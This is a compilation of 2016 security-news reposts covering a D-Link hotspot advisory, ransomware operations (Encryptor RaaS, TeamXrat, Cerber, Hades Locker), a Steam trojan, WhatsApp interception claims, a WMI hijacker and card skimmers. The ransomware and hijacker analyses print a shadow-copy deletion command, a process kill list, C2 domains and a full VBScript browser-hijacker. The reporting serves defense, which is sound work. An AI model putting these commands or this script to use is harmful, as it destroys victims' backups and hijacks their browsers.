An attacker can overwrite the router’s firmware with a custom firmware if they wanted to, “but with all these vulnerabilities present in the default firmware, I don’t think it is worth making the effort,” Kim says. He also notes that, because the device has a sizable memory (168 MB), a decent CPU, and good free space (235 MB), along with complete toolkits installed by default, users should consider trashing it, “because it’s trivial for an attacker to use this router as an attack vector.”

D-Link was informed on these issues in June, but the company failed to resolve them until now. Because 90 days have passed since the vulnerabilities were disclosed to the vendor, Kim decided to publish an advisory to reveal these bugs.

This is not the first time D-Link products have made it to the headline due to security vulnerabilities. The company patched a critical flaw in several DIR model routers in August, after a popular D-Link Wi-Fi camera was found in June to be affected by a serious flaw that was subsequently discovered in over 120 D-Link products.

Source:http://www.securityweek.com/

KNOWLEDGE BELONGS TO THE WORLD

The post Vulnerabilities, Backdoors Found in D-Link Mobile Hotspot appeared first on Information Security Newspaper.

Misconfigured server led to Encryptor RaaS’ downfall. After law enforcement seized servers belonging to Encryptor RaaS, a Ransomware-as-a-Service cyber-crime portal, the site’s operators decided to close it down for good over the summer and deleted the master decryption key that would have allowed victims to recover their files.

This action from the Encryptor RaaS owner has left countless of victims in the unpleasant position of not being able to decrypt their files, even if they were willing to pay.

Trend Micro and law enforcement shut down Encryptor RaaS

According to an investigation from security firm Trend Micro, the Encryptor RaaS service, which launched in July 2015, started to unravel exactly one year later, in July 2016.

The security vendor says the admin was careless and left one of the servers that stored information about the RaaS service unprotected online, without being hidden using the Tor service.

Trend Micro says that the server, named “Encryptor RaaS Decryptor,” was easy to discover via Shodan, and anyone knowing what to look for would have found it very easily.

The security vendor didn’t waste time and tipped off US and European law enforcement agencies, which contacted the cloud provider where the server was hosted and had it seized.

Bitter Encryptor RaaS admin deletes master key

At that point, the Encryptor RaaS admin immediately shut down the service. After two failed attempts in the next four days to revive his portal, and after law enforcement seized three more of his production servers, he finally decided to give it up.

Annoyed by the fact that law enforcement had effectively shut down his money-making operation, the crook announced he wouldn’t be releasing anything to help victims, neither the ransomware’s source code, nor the master key, which can unlock any of the infected victims’ data.

Encryptor RaaS shutdown announcements

As a comparison, when the TeslaCrypt ransomware decided to shut down (for unknown reasons), its operators released the master decryption key, so that victims who didn’t pay could recover their files.

Encryptor RaaS was a very popular service

For the time it was online, Encryptor RaaS was one of the most popular RaaS services, mainly because its creator took only a 5 percent cut, compared to other services that asked between 20 and 40 percent.

Additionally, the service received regular updates, and its creator had heavily invested in anti-AV detection measures, such as the purchase and usage of stolen digital certificates.

Encryptor was also popular because outside the Windows variant of his ransomware, the service also provided a Linux version for locking web servers.

Is RaaS a successful criminal business model?

Encryptor’s takedown also marks the first time Trend Micro has shut down a RaaS service.

“It’s a fairly new business model, but the fact that it went away so quickly is reason to be cautiously optimistic that public private partnerships and LE [law enforcement] actions […] will make it an infeasible business model,” said Rik Ferguson, VP Security Research at Trend Micro.

“It doesn’t seem to be a particularly attractive or sustainable model for ransomware,” he also adds about RaaS services. “Not if the affiliates are intelligent anyway.”

Encryptor RaaS server available via Shodan

KNOWLEDGE BELONGS TO THE WORLD

The post Bitter Ransomware Operator Shuts Down Service and Deletes Decryption Master Key appeared first on Information Security Newspaper.

Kaspersky posted a great article about their TeamXrat Ransomware analysis and how they were able to create a decryptor for its victims.  Reported back in mid September in our forums, I and other security researchers were never able to find an actual sample of the malware.  It turns out that this was because the ransomware is being manually installed via hacked RDP services and then manually cleaned up after the installation is finished.

Installed via Hacked Remote Desktop Services

According to Kaspersky, this ransomware, which they have named the Xpan Ransomware, is created by a Brazillian cybergang that goes by the name TeamXrat or CorporacaoXRat. This group targets servers and computers running Remote Desktop Services and attempt to brute force passwords to gain access. Once they are able to gain access, they will manually install the ransomware and encrypt the victims data.

Depending on the version of the ransomware, when the files are encrypted they will have the ___xratteamLucked or the ____xratteamLucked extension appended to the filenames.  A ransom note will also be created called Como descriptografar os seus arquivos.txt. This file name translates from Portuguese to English as How to decrypt your files.

Below is an example of this ransom note:

The ransomware will also change the desktop wallpaper to the following image.

Victim’s are then asked to email the ransomware developers in order to get payment instructions, where the developers will ask for a 1 bitcoin ransom payment.  Emails that Kaspersky report have been associated with this ransomware are xRatTeam@mail2tor.com and corporacaoxrat@mail2tor.com.

Kaspersky to the Rescue

The good news is that Kaspersky was able to crack the encryption being used by the Xpan Ransomware / TeamXrat Ransomware. For those who have been affected by this ransomware and whose encrypted files end with the ___xratteamLucked (3 underscores) and the____xratteamLucked (4 underscores) extension, do not pay the ransom! Instead you can contact Kaspersky at their support page.

It is unknown if Kaspersky is charging for this service, but in the past they have released their decryptors for free. My guess is that they are not making the decryptor publicly available to prevent TeamXrat from learning the weakness in their encryption algorithm.

Source:http://www.bleepingcomputer.com/

KNOWLEDGE BELONGS TO THE WORLD

The post Kaspersky decrypts Ransomware from TeamXRat appeared first on Information Security Newspaper.

An Israeli company is marketing what appears to be an astonishing surveillance capability, claiming it can siphon off all WhatsApp chats, including encrypted communications, from phones within close proximity of a hidden Wi-Fi hacking device in a backpack.

Brochures leaked to FORBES, and published below, revealed a non-public offering from Haifa-based Wintego called CatchApp. It promises an “unprecedented capability” to break through WhatsApp encryption and grab everything from a target’s account. It does so through a “man-in-the-middle” (MITM) attack; in theory the traffic is intercepted between the app and the WhatsApp server and somehow the encryption is decoded by the device, though that may not be possible with the latest upgrades to the software’s cryptography.

According to the anonymous source who handed FORBES the documents, the product works on the most current versions of WhatsApp, noting the brochures were handed out at a policing event this year. They could not offer any proof of that claim, however, and the files may date from before WhatsApp added significantly stronger end-to-end encryption.

WhatsApp, owned by Facebook FB +0.02%, started deploying end-to-end encryption with the much-respected Signal protocol in late 2014. But the full rollout wasn’t complete until April this year. The Wintego brochure is no older than April 2015, the date the literature cites for the number of WhatsApp users at 800,000. WhatsApp hit one billion users in February 2016, however, begging the question: why not use the more current figure?

Is it possible?

The CatchApp feature can be delivered from Wintego’s WINT product, a hacking device that fits snugly into a backpack, according to the documents. Other brochures handed to FORBES claimed the WINT “data extraction solution” can obtain “the entire contents of your targets’ email accounts, chat sessions, social network profiles, detailed contact lists, year-by-year calendars, files, photos, web browsing activity, and more.” It does that by acquiring login credentials for distinct accounts and then silently download “all the data stored therein”.

WINT’s Cyber Data Extractor can overcome “the encryption and security measures of many web accounts and apps” to grab those credentials, Wintego claimed. Where there are no credentials required – with chat apps like WhatsApp and, presumably, Facebook Messenger, Google GOOGL +0.13% Allo, Telegram, etc. – the Extractor can pilfer “secured data right from the apps.”

Wintego claims WINT first gains access to a device by intercepting Wi-Fi communications, whether they’re open or private encrypted networks. WINT uses four separate Wi-Fi access points so it can track multiple targets and high-gain antennas to catch those at a distance. It’s small enough to fit into any backpack, said Wintego, so is ideal for stealthy operations.

Security experts aren’t convinced Wintego’s kit is as powerful as advertised, though, and it shouldn’t be possible to crack open WhatsApp using the firm’s techniques. It may be, suggested Jonathan Zdziarski, that the CatchApp tech is exploiting Secure Sockets Layer (SSL) encryption. “I suspect they’re taking advantage of a number of vulnerabilities in SSL implementations… many systems are susceptible to downgrade attacks and other types of MITMs.” SSL is no longer in use in the Signal protocol, however, replaced recently by an alternative called Noise. But many other chat apps continue to use SSL.

Another possibility is that CatchApp is malware thrust onto a device over Wi-Fi that specifically targets WhatsApp. But it’s almost certain the product cannot crack the latest standard of WhatsApp cryptography, said Matthew Green, a cryptography expert and assistant professor at the Johns Hopkins Information Security Institute. Green, who has been impressed by the quality of the Signal code, added: “They would have to defeat both the encryption to and from the server and the end-to-end Signal encryption. That does not seem feasible at all, even with a Wi-Fi access point.

“I would bet mundanely the password stuff is just plain phishing. You go to some site, it asks for your Google account, you type it in without looking closely at the address bar.

“But the WhatsApp stuff manifestly should not be vulnerable like that. Interesting.”

Neither WhatsApp nor the crypto whizz behind Signal, Moxie Marlinspike, were happy to comment unless more specific details were revealed about the tool’s capability. Either Wintego is embellishing what its real capability is, or it has a set of exploits that the rest of the world doesn’t yet know about.

Wintego in Taiwan

Wintego was founded by alumni of Verint, another Israeli firm, but one that’s become a dominant force in the surveillance sphere, most notably as a provider for America’s National Security Agency (NSA).

Yuval Luria acts as the face of the company, promoting the kit at major surveillance shows. He recently presented at the ISS World Training event in Prague (also known as the Wiretappers’ Ball), giving a talk on A Hybrid Tactical-Strategic Approach for Extracting Cyber Intelligence. Nhevo Kaufman appears to act as company chief, having set up the firm’s website back in 2011.

Wintego chiefs Nhevo Kaufman (left) and Yuval Luria (right). Photos from their respective LinkedIn profiles.

Possibly in an attempt to keep their identities under wraps, neither publicly note their affiliation with Wintego on their respective LinkedInLNKD -0.74% profiles. Instead, Luria lists no company at all, whilst Kaufman is the founder and CEO of NK Business Ventures (NK-BV), a company that has no public website and for which there’s little-to-zero public information. FORBES believes NK-BV is the parent of Wintego or is a sales arm for the company and others in industrial surveillance complex.

In a brief conversation with FORBES, Kaufman could not confirm that, not could he say whether the CatchApp tool still worked against the most current version of WhatsApp. He declined to offer any specific information about the provider. “Any specific details about products is in contrary to the sensitivity of the products due to the customers that are using them,” Kaufman added.

“I’m not interested in giving any specific details. I would jeopardise the sensitive issues of our customers who are using products like this. Naturally they’re customers that are governmental customers… referring to specific details of the product is not something that would be appropriate to put in an article like this.”

The most revealing information about NK Business Ventures can be found in the Wikileaks-hosted files leaked from spyware provider Hacking Team. Luria, in discussions about forming a partnership between NK-BV and Hacking Team, noted: “The company represents several key customers and integrators in different countries, providing security and intelligence solutions from both the Israeli market and the international market.”

In the thread, dated October 2012, Luria reveals the company represents Taiwan, though doesn’t disclose the name of the body he worked with. By the end of that conversation, a deal with Hacking Team – a company criticised for selling invasive tools to country’s with weak human rights records – is all but confirmed. “In his words the opportunity seems very concrete and if we want to try to visit the client on Wednesday 31 October straight after Macao we need to send him asap the Dealer Agreement,” wrote Hacking Team’s Singapore representative Daniel Maglietta. There was, however, no further open email communication between the two parties.

Wintego is, then, another member of the highly-secretive surveillance industry and another of Israel’s elite professional spy industry. It has a number of equally-reticent competitors in the Wi-Fi intercept game, including two firms FORBES encountered at the Milipol event in Paris last November: Israel’s Rayzone and China’s Long Hope. Ability Inc., a provider of network exploitation capabilities that promises to spy on any device with just a telephone number for $20 million, ranked Wintego as one of its competitors too.

As with Hacking Team, human rights experts are worried about who is watching over exports of such powerful technology and if it’s being used responsibly. “Wintego continue to position themselves as a global threat to individuals privacy, creating technology like CatchApp to attack WhatsApp, a messaging app that is used by diplomats, journalists and the general public alike,” said Christopher Weatherhead, technologist at Privacy International.

“Although it appears unclear from the documents the efficacy of this technology, it is useful to understand possible weaknesses in the software and how it can betray us. Which could allow a slew of nefarious characters such as hackers and malware companies to gain access to people’s communications.”

Source:http://www.forbes.com/

KNOWLEDGE BELONGS TO THE WORLD

The post Spy Tech ‘Hacks WhatsApp Encrypted Chat From A Backpack’ appeared first on Information Security Newspaper.

Yesterday, I stumbled on a post where a Reddit user named Haydaddict was alerting people about some hacked Steam accounts spreading malware. As I am always interested in new malware, I took a look to see what could be discovered.

According to the post, the hacked accounts were being used to SPAM suspicious links using Steam chat. These chat messages would tell the recipient to go to videomeo.pw to watch a video.

When the target went to the page, they would be greeted with a message stating that they needed to update Flash Player in order to watch the video.

If a target downloads the installer and executes it, they will find that it does not appear to do anything. This is because the Flash Player installer is actually a Trojan that executes a PowerShell script called zaga.ps1, which will download a 7-zip archive, 7-zip extractor, and a CMD script from the zahr.pw server.

Once the files are downloaded, the PowerShell script will then launch the CMD file, which will extract thesharchivedmngr to the %AppData%\lappclimtfldr folder and configure Windows to automatically start the mcrtvclient.exe program when a user logs in. This program is actually a renamed copy of the NetSupport Manager Remote Control Software.

When the program is launched, it will connect to the NetSupport gateway at leyv.pw:11678 and await commands. This allows the attacker to remotely connect to the infected computer and take control over it.

For those who are concerned they are infected with this Steam Trojan, I suggest they check the %AppData% folder for the specified folders.

Furthermore, all users must be careful with what links they visit and what downloads they install.  These days it is becoming more and more frequent for accounts to be hacked and then for attackers to use them to distribute malware.  Stay vigilant, be careful, and make sure you have an antivirus software installed.

KNOWLEDGE BELONGS TO THE WORLD

The post Hacked Steam accounts spreading Remote Access Trojan appeared first on Information Security Newspaper.

KNOWLEDGE BELONGS TO THE WORLD

The post Space Wars Will Be Fought With Hacks, Not Missiles appeared first on Information Security Newspaper.

The newly-discovered bug gives attackers the chance to execute code through the open-source JPEG 2000 codec.

Cisco Talos researchers have uncovered a severe zero-day flaw in the OpenJPEG JPEG 2000 codec which could lead to remote code execution on compromised systems.

On Friday, researchers from Cisco revealed the existence of the zero-day flaw in the JPEG 2000 image file format parser implemented in OpenJPEG library. The out-of-bounds vulnerability, assigned as CVE-2016-8332, could allow an out-of-bound heap write to occur resulting in heap corruption and arbitrary code execution.

OpenJPEG is an open-source JPEG 2000 codec. Written in C, the software was created to promote JPEG 2000, an image compression standard which is in popular use and is often used for tasks including embedding images within PDF documents through software including Poppler, MuPDF and Pdfium.

The bug, assigned a CVSS score of 7.5, was caused by errors in parsing mcc records in the jpeg2000 file, resulting in “an erroneous read and write of adjacent heap area memory.” If manipulated, these errors can lead to heap metadata process memory corruption.

In a security advisory, the team said the security vulnerability can be exploited by attackers if victims open specifically crafted, malicious JPEG 2000 images. For example, if this content was within a phishing email or hosted on legitimate services such as Google Drive or Dropbox, once downloaded to their system, the path is created for attackers to execute code remotely.

The vulnerability was discovered by Aleksander Nikolic from the Cisco Talos security team in OpenJpeg openjp2 version 2.1.1.

Cisco Talos disclosed the vulnerability to affected vendors on 26 July, granting them time to prepare patches to fix the problem before public release.

Source:http://www.zdnet.com/

KNOWLEDGE BELONGS TO THE WORLD

The post OpenJPEG zero-day flaw leads to remote code execution appeared first on Information Security Newspaper.

Successful compromises come “a couple times an hour,” researcher finds.

A major battle is underway for control over hundreds of millions of network-connected digital video recorders, cameras, and other so-called Internet of Things devices. As Ars has chronicled over the past two weeks, hackers are corralling them into networks that are menacing the security news site KrebsOnSecurity and other Web destinations with some of the biggest distributed denial-of-service attacks ever recorded.

KNOWLEDGE BELONGS TO THE WORLD

The post How hard is it to hack the average DVR? Sadly, not hard at all appeared first on Information Security Newspaper.

Late last week, a new version of Cerber Ransomware was released that included some new features. The most notable change is the switch from the static .Cerber3extension for encrypted files to a random 4 character extension, the use of a HTA file as the ransom note, and the termination of various database processes before encryption.

With this version, when a victim’s files are encrypted, not only will the filename be scrambled, but the extension will be replaced as well.  This means that a file that was previously encrypted as 5NgPiSr5zo.cerber3, would now be encrypted to a name like 1xQHJgozZM.b71c.

This version also includes a new ransom note called README.hta. When launched, the ransom note will appear in an application Window and display the normal ransom note. An example of the README.hta file can be found below.

According to security researcher BloodDolly, this update also includes the addition of new database processes that are closed by the close_process directive in Cerber’s configuration.  This directive tells Cerber to terminate certain processes before encryption begins. The directive and the current list of processes being terminated are:

 "close_process":
 {
  "close_process":1,
  "process":["msftesql.exe","sqlagent.exe","sqlbrowser.exe","sqlservr.exe","sqlwriter.exe","oracle.exe","ocssd.exe","dbsnmp.exe","synctime.exe","mydesktopqos.exe","agntsvc.exeisqlplussvc.exe","xfssvccon.exe","mydesktopservice.exe","ocautoupds.exe","agntsvc.exeagntsvc.exe","agntsvc.exeencsvc.exe","firefoxconfig.exe","tbirdconfig.exe","ocomm.exe","mysqld.exe","mysqld-nt.exe","mysqld-opt.exe","dbeng50.exe","sqbcoreservice.exe"]
 },

These processes are closed in order to enable the processes’s data files to be encrypted. If the processes are running during encryption, then the corresponding data files may not be accessible for encryption by Cerber.

Finally, this version of Cerber Ransomware continues to send UDP packets to the 31.184.234.0/23 range for statistical purposes.

Source:http://www.bleepingcomputer.com/

KNOWLEDGE BELONGS TO THE WORLD

The post Cerber Ransomware switches to a Random Extension and Ends Database Processes appeared first on Information Security Newspaper.

The WildFire Locker ransomware has risen from the dead and rebranded itself using the apropos name of Hades Locker. In late August, WildFire Locker disappeared after the organizations behind NoMoreRansom.org were able to seize control of the ransomware’s Command & Control servers. This allowed NoMoreRansom to gain access to many of the decryption keys for the ransomware’s victims. Unfortunately, the ransomware developers were not apprehended and it now appears they have been biding their time before releasing a new ransomware.

Hades Locker was discovered yesterday by Michael Gillespie when a victim uploaded a copy of the ransomware’s ransom note to ID Ransomware.

Today, ProofPoint security researcher Matthew Mesa discovered a sample and after MalwareHunterTeam examined it, it was determined that Hades Locker is a new version of the WildFire locker.

Unfortunately, at this time the encryption used by Hades Locker is secure, so there is no way to recover a victim’s files for free. For those who wish to discuss this ransomware further, you can use the Hades Locker Help & Support Topic.

The Hades Locker Encryption Process

It is not currently known how Hades Locker is being distributed, but once executed it will connect to http://ip-api.com/xml to retrieve the IP address of the victim and their geographic location.  It will then send  a unique victimID, called hwid, a tracking ID, which is currently set to 0002, the computer name, the user name, the country, and the IP address of the victim to one of the configured Command & Control servers

The command and control server will then reply with a password to use to encrypt the files using AES encryption.

During this process, Hades Locker will store in the Registry the hwid and a Status entry that will either be set to 0 or 1 depending on whether the encryption process has been finished. The registry key this information is written to is:

HKCU\Software\Wow6232Node

Hades Locker will now begin to encrypt all of the files on mapped drives that match certain file extensions. When encrypting the files it will use AES encryption and append an extension made up of the string “.~HL” plus the first 5 letters of the encryption password.  For example, test.jpg could be encrypted as test.jpg.~HLH6215.

The file extensions targeted by Hades Locker are:

.contact,.dbx,.doc,.docx,.jnt,.jpg,.mapimail,.msg,.oab,.ods,.pdf,.pps,.ppsm,.ppt,.pptm,.prf,.pst,.rar,.rtf,.txt,.wab,.xls,.xlsx,.xml,.zip,.1cd,.3ds,.3g2,.3gp,.7z,.7zip,.accdb,.aoi,.asf,.asp,.aspx,.asx,.avi,.bak,.cer,.cfg,.class,.config,.css,.csv,.db,.dds,.dwg,.dxf,.flf,.flv,.html,.idx,.js,.key,.kwm,.laccdb,.ldf,.lit,.m3u,.mbx,.md,.mdf,.mid,.mlb,.mov,.mp3,.mp4,.mpg,.obj,.odt,.pages,.php,.psd,.pwm,.rm,.safe,.sav,.save,.sql,.srt,.swf,.thm,.vob,.wav,.wma,.wmv,.xlsb,.3dm,.aac,.ai,.arw,.c,.cdr,.cls,.cpi,.cpp,.cs,.db3,.docm,.dot,.dotm,.dotx,.drw,.dxb,.eps,.fla,.flac,.fxg,.java,.m,.m4v,.max,.mdb,.pcd,.pct,.pl,.potm,.potx,.ppam,.ppsm,.ppsx,.pptm,.ps,.pspimage,.r3d,.rw2,.sldm,.sldx,.svg,.tga,.wps,.xla,.xlam,.xlm,.xlr,.xlsm,.xlt,.xltm,.xltx,.xlw,.act,.adp,.al,.bkp,.blend,.cdf,.cdx,.cgm,.cr2,.crt,.dac,.dbf,.dcr,.ddd,.design,.dtd,.fdb,.fff,.fpx,.h,.iif,.indd,.jpeg,.mos,.nd,.nsd,.nsf,.nsg,.nsh,.odc,.odp,.oil,.pas,.pat,.pef,.pfx,.ptx,.qbb,.qbm,.sas7bdat,.say,.st4,.st6,.stc,.sxc,.sxw,.tlg,.wad,.xlk,.aiff,.bin,.bmp,.cmt,.dat,.dit,.edb,.flvv,.gif,.groups,.hdd,.hpp,.log,.m2ts,.m4p,.mkv,.mpeg,.ndf,.nvram,.ogg,.ost,.pab,.pdb,.pif,.png,.qed,.qcow,.qcow2,.rvt,.st7,.stm,.vbox,.vdi,.vhd,.vhdx,.vmdk,.vmsd,.vmx,.vmxf,.3fr,.3pr,.ab4,.accde,.accdr,.accdt,.ach,.acr,.adb,.ads,.agdl,.ait,.apj,.asm,.awg,.back,.backup,.backupdb,.bank,.bay,.bdb,.bgt,.bik,.bpw,.cdr3,.cdr4,.cdr5,.cdr6,.cdrw,.ce1,.ce2,.cib,.craw,.crw,.csh,.csl,.db_journal,.dc2,.dcs,.ddoc,.ddrw,.der,.des,.dgc,.djvu,.dng,.drf,.dxg,.eml,.erbsql,.erf,.exf,.ffd,.fh,.fhd,.gray,.grey,.gry,.hbk,.ibank,.ibd,.ibz,.iiq,.incpas,.jpe,.kc2,.kdbx,.kdc,.kpdx,.lua,.mdc,.mef,.mfw,.mmw,.mny,.moneywell,.mrw,.myd,.ndd,.nef,.nk2,.nop,.nrw,.ns2,.ns3,.ns4,.nwb,.nx2,.nxl,.nyf,.odb,.odf,.odg,.odm,.orf,.otg,.oth,.otp,.ots,.ott,.p12,.p7b,.p7c,.pdd,.pem,.plus_muhd,.plc,.pot,.pptx,.psafe3,.py,.qba,.qbr,.qbw,.qbx,.qby,.raf,.rat,.raw,.rdb,.rwl,.rwz,.s3db,.sd0,.sda,.sdf,.sqlite,.sqlite3,.sqlitedb,.sr2,.srf,.srw,.st5,.st8,.std,.sti,.stw,.stx,.sxd,.sxg,.sxi,.sxm,.tex,.wallet,.wb2,.wpd,.x11,.x3f,.xis,.ycbcra,.yuv

While performing encryption, it will skip any files whose path contain the following strings:

windows
program files
program files (x86)
system volume information
$recycle.bin

To prevent victims from recovering their files from the Shadow Volume Copies, it will delete them using the following command:

WMIC.exe shadowcopy delete /nointeractive

Finally, in each folder that a file is encrypted it will also create  three ransom notes named README_RECOVER_FILES_[victim_id].html,README_RECOVER_FILES_[victim_id].png, and README_RECOVER_FILES_[victim_id].txt.

These ransom notes will contain links to the Command & Control servers located at n7457xrhg5kibr2c.onion, http://pfmydcsjib.ru, and http://jdybchotfn.ru. Victim’s are advised to go to one of these sites to learn the ransom amount and for instructions on how to make a payment.

The Hades Locker Payment Site

The Hades Locker payment site can be accessed via two C2 servers located on the Internet or by connecting directly to the TOR onion address. To connect directly to the onion site, victims would need to install a special program called TOR.  By using two sites that are on the Internet and connect as a gateway to the TOR site, it makes it easier for victim’s to access their payment instructions.

When a victim connects to the payment site they will be shown a general information page that describes how much they need to pay, what bitcoin address a payment should be sent to, and information on how to get bitcoins. On this payment site the developers refer to themselves as a company called Hades Enterprises.

In addition to the main information page, the Hades Locker payment site also includes the following sections:

Frequently Asked Questions page: This page contains answers to common questions.

A test decryption page: This page supposedly allows a victim to perform a test decryption. In my tests, I could find no way to upload a file.

A Help Desk page: This page allows a victim to ask support questions and receive responses from the ransomware developers.

A Decryption Tutorial Page: This page contains a tutorial on how to use the decryptor for those who paid the ransom.

Once again, for those who wish to discuss this ransomware further, you can use theHades Locker Help & Support Topic.

Files associated with Hades Locker:

README_RECOVER_FILES_[victim_id].html
README_RECOVER_FILES_[victim_id].png
README_RECOVER_FILES_[victim_id].txt
%UserProfile%\AppData\Local\Temp\RarSFX0\
%UserProfile%\AppData\Local\Temp\RarSFX0\Ronms.exe
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ronms.lnk
%UserProfile%\AppData\Roaming\wow6232node\
%UserProfile%\AppData\Roaming\wow6232node\Bamvenagxe.xml
%UserProfile%\AppData\Roaming\wow6232node\Ronms.exe

Registry Entries associated with Hades Locker:

HKCU\Software\Wow6232Node\hwid	[victim_id]
HKCU\Software\Wow6232Node\status	1

Network Communication associated with Hades Locker:

n7457xrhg5kibr2c.onion
http://pfmydcsjib.ru
http://jdybchotfn.ru

Source:http://www.bleepingcomputer.com/

KNOWLEDGE BELONGS TO THE WORLD

The post WildFire rises from the grave as the rebranded Hades Locker appeared first on Information Security Newspaper.

Windows Management Instrumentation (WMI) hijackers are proving to be a plague to remove for the average user. Even experienced users may be stumped if they run into one and don’t know where to look.

What are they?

To explain why they are so hard to find requires an introduction to WMI. As the name Windows Management Instrumentation implies, this is a set of tools that manage devices and applications in a Windows environment. This includes (remotely) changing system settings, properties, and permissions. One problem is that it’s not recommended to disable WMI, as you might with WScript, because it is also in use for system critical operations (e.g. the Windows Update).

So why is it so hard to find the malware?

The actions to be executed by the WMI are scripted either in Visual Basic or Powershell and stored in a special repository. To view them, you will need to use special tools like WMI Explorer:

Effectively, the script to be executed is hidden from the user, and the script (as a file) isn’t stored on the system. Which is why it is considered as another fileless infection. WMI techniques were used by malware like Stuxnet in the past.

WMI also offers a great deal of tools to gather information about a system or a network.

How are the bad guys using WMI?

To answer this, let’s first understand how a WMI script is executed normally on a Windows system. In this case, the execution of the script is done by the “ASEC” instance of ActiveScriptEventConsumer. Below is the code for a WMI script hijacker that we’re going to use as an example:

Dim objFS:Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = http://9o0gle.com/
Const linkChrome = " --load-extension=""C:\Users\{username}1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"" http://9o0gle.com/"
browsers = Array("IEXPLORE.EXE", "firefox.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe","chrome.exe","360chrome.exe")
ChromeBrowsers = Array("chrome.exe","360chrome.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
  BrowserDic.Add LCase(browser), browser
Next
Set ChromeBrowserDic = CreateObject("scripting.dictionary")
For Each ChromeBrowser In ChromeBrowsers
  ChromeBrowserDic.Add LCase(ChromeBrowser), ChromeBrowsers
Next
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\{username}\Desktop"
FoldersDic(5) = "C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\{username}\AppData\Roaming"
FoldersDic(9) = "C:\Users\{username}\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\{username}\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\{username}\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
  For Each file In fso.GetFolder(FoldersDic(i)).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
      set oShellLink = WshShell.CreateShortcut(file.Path)
      path = oShellLink.TargetPath
      name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
      If BrowserDic.Exists(LCase(name)) Then
        If ChromeBrowserDic.Exists(LCase(name)) Then
          oShellLink.Arguments = linkChrome
        else
          oShellLink.Arguments = link
        End if
        If file.Attributes And 1 Then
          file.Attributes = file.Attributes – 1
        End If
        oShellLink.Save
      End If
    End If
  Next
Next
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

Effectively, this WMI script hijacker sample looks for browser shortcuts in a list of folders. It then appends the hijacker’s URL—in this instance, 9o0gle.com—to these shortcuts, so when users double-click the Firefox browser shortcut, for example, the said .com site is also opened.

For Chrome-based browsers, a special extension is loaded. This extension is dropped to the drive, making this infection not completely fileless.

So far, every WMI hijacker we have seen belongs to the same family often referred to as Yeabests, which is after the domain the users are hijacked to.

File details

Malwarebytes detects this WMI hijacker as PUP.Optional.Elex.ClnShrt. Some elements of the resulting infection are detected as the more general PUP.Optional.WMIHijacker.ClnShrt. More details can be found in or removal guide for 9o0gle on the forums.

SHA1 9o0gle.exe:  ea6445c8e29b134d11d512c2faca974b91468ef9

Users of Malwarebytes Anti-Malware Premium are protected against this hijacker—

—and the connections the infection tries to make.

Summary

This post describes how WMI hijackers work and why they are hard to find on an affected system. It also shows an example of such a hijacker.

Source:https://blog.malwarebytes.com

KNOWLEDGE BELONGS TO THE WORLD

The post Explained: WMI hijackers appeared first on Information Security Newspaper.

Popular ecommerce sites have been infected with web-based keyloggers that are being used to steal credit card data as it’s entered into online checkout forms. More than 100 compromised sites have been identified, but the number could be in the thousands, researchers said. RiskIQ, in collaboration with ClearSky, published their findings (PDF) Thursday, and said some of the ecommerce sites impacted include Everlast Worldwide, the Australian ecommerce site for apparel giant Guess and Fidelity Investments’ FidelityStore, a site maintained by a third-party firm SwervePoint.

In a statement to Threatpost, Fidelity Investments said the site is not one that “serves our customers or the general public” and is “hosted, managed and operated by a third-party vendor and is separate from Fidelity’s technology infrastructure, including the infrastructure that serves our customers.” It added it wasn’t aware of anyone affected “by this issue.” Everlast Worldwide declined to comment and representatives from SwervePoint and Guess did not reply to requests for comment. The campaign is tied to a single unidentified hacking group, RiskIQ said, that began its most recent wave of attacks in March. Many of the sites are still actively stealing credit card data, according Darren Spruell, threat researcher at RiskIQ. RiskIQ warned an undisclosed number of sites impacted by the vulnerability. However, Spruell said, only a tiny fraction acknowledged being notified. “When someone makes a purchase and enters their credit card data at these sites, that data is stolen and sent back to attackers in real time,” he said. Researchers say many of the hacked ecommerce websites run the open source Magento ecommerce platform. Earlier this summer, researchers at Sucuri identified an uptick in the use a new variant of a web-based keylogger, also called a credit card stealer, which stole credit card data in real time from the Magento ecommerce platform. However, RiskIQ said hackers behind this most recent wave of attacks are similar but are targeting additional ecommerce platforms such as Powerfront CMS and OpenCart. Spruell said it isn’t clear what vulnerability attackers are exploiting, but added it could be any number of vulnerabilities within the server stack that would allow malware to be installed. According to RiskIQ, the attackers place a “simple” script tag on the targeted ecommerce website. A script tag is simply lines of web coding that can trigger additional actions; such as loading malicious JavaScripts or additional scripts hosted on remote servers. When a checkout form is detected, the script tag injects the keylogger JavaScript from an external domain. Whenever credit card information is entered into a website the data is forwarded to an attacker-controlled domain. By injecting the JavaScript from a remote domain this allows the attacker to perform any modifications in the malware source code without the need of reinfecting the site, Sucuri said in its report. This attack method also has its advantages in that it ensures that credit card data is new, valid and accounts have funds available, Spruell said. While web-based keyloggers and credit card stealers aren’t uncommon, RiskIQ believes these 